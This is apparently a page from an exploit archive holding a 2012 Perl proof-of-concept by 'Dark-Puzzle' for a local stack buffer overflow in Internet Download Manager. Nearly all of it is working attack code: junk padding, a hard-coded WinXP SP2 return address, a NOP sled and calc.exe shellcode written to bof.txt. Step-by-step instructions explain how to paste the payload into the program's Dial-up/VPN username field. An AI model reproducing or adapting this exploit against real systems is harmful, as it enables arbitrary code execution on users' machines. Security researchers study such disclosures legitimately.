扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 |
#!/usr/bin/perl # 1 ========================================== 1 # 0 I'm Dark-Puzzle From Inj3ct0r TEAM 0 # 01 # 1 dark-puzzle[at]live[at]fr0 # 0 ========================================== 1 # 1White Hat 1 # 0 Independant Pentester0 # 1exploit coder/bug researcher0 # 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 # Title: Internet Download Manager All Versions - Stack Based Buffer Overflow Vulnerability. # Author : Dark-Puzzle (Souhail Hammou) # Type : Local # Risk : Critical # Vendor : Tonec Inc. # Versions : All versions of IDM are Vulnerable . # Tested On : Windows XP Service Pack 2 FR 32-bits . # Date : 14 September 2012 # Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ... #Usage : Copy this script to idman.pl #Execute : perl idman.pl #Go to the file bof.txt , Select ALL , then Copy . # After copying the whole line Go To Downloads ---> Options ----> Dial up / VPN ----> paste the line into the username field and let the password field blank then click Enter . #French Version : Go to : Telechargement ---> Options ---> Internet ---> then Copy The Whole line from bof.txt and paste it into the username field and let the password field blank then click Enter . # BETTER COPY THE CONTENT OF THE FILE USING NOTEPAD++ # Bingo ! Calc.exe will show up (P.S : If you're using other that WinXP SP2 Fr you'll have to change the return address with the compatible one with your system ) my $junk = "A" x 2313 ; my $eip = "\x5D\x38\x82\x7C" ; # For WinXP SP2 Only . my $nops = "\x90" x 5 ; my $shellcode = # Calc.exe Shellcode (19 bytes) "\xeB\x02\xBA\xC7\x93". "\xBF\x77\xFF\xD2\xCC". "\xE8\xF3\xFF\xFF\xFF". "\x63\x61\x6C\x63"; $payload= $junk.$eip.$nops.$shellcode; open(myfile,'>bof.txt'); print myfile $payload; close(myfile); print "Wrote ".length($payload)." bytes\n"; #Datasec Team . |
体验盒子
